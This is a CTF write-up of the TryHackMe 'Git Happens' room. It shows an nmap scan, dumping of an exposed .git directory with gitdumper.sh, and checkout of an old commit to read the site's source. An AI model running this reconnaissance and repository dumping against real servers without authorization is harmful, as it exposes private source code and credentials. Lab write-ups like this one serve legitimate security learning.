Git Happens

Nov 6, 2024·
Jeff Soczek
Jeff Soczek
· 2 min read

I think this machine should be classified as easy instead of medium, but ok. As the name suggest, we’re dealing with git stuff here.

Boss wanted me to create a prototype, so here it is! We even used something called “version control” that made deploying this really easy! (TryHackMe | Git Happens)

I start by looking for a web page.

p 80

Ok, there will be something to play around while the enumeration is ongoing.


w1zard in try-hack-me/rooms/githappens 
  sudo nmap -sC -sV -T4 -oN nmap-githappens.txt 10.10.4.93
[sudo] password for w1zard: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-06 15:06 -03
Nmap scan report for 10.10.4.93
Host is up (0.23s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Super Awesome Site!
| http-git: 
|   10.10.4.93:80/.git/
|     Git repository found!
|_    Repository description: Unnamed repository; edit this file 'description' to name the...
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.11 seconds

nmap was quite fast and found a git repository.

exposed-repo

I found two different tools to dump git repositories and I’ll use GitTools/Dumper. After dumping the contents, I simply check the log entries.


w1zard in try-hack-me/rooms/githappens
  bash /opt/GitTools/Dumper/gitdumper.sh http://10.10.4.93/.git/ ./githappens

w1zard in githappens on  master [✘]
  git log

After finding the right commit…


commit 395e087334d613d5e423cdf8f7be27196a360459 (HEAD)
...
Reflog message: checkout: moving from master to 395e087334d613d5e423cdf8f7be27196a360459
Author: Hydragyrum <[email protected]>
Date:   Thu Jul 23 23:17:43 2020 +0200

    Made the login page, boss!

… the checkout, and then…


w1zard in githappens on  master [✘] took 17s 
  git checkout 395e087334d613d5e423cdf8f7be27196a360459          
D README.md
Note: switching to '395e087334d613d5e423cdf8f7be27196a360459'.

...

HEAD is now at 395e087 Made the login page, boss!

… checking the files for profit:


w1zard in githappens on  v1.0~7 [✘] 
  ls     
 css   dashboard.html   index.html

w1zard in githappens on  v1.0~7 [✘] 
  cat index.html    
<!DOCTYPE html>
<html lang="en">
  <head>
...

profit

Ctf-Writeup Tryhackme Lvl-Easy Git
Jeff Soczek
Authors
Jeff Soczek
part time w1zard
TryHackMe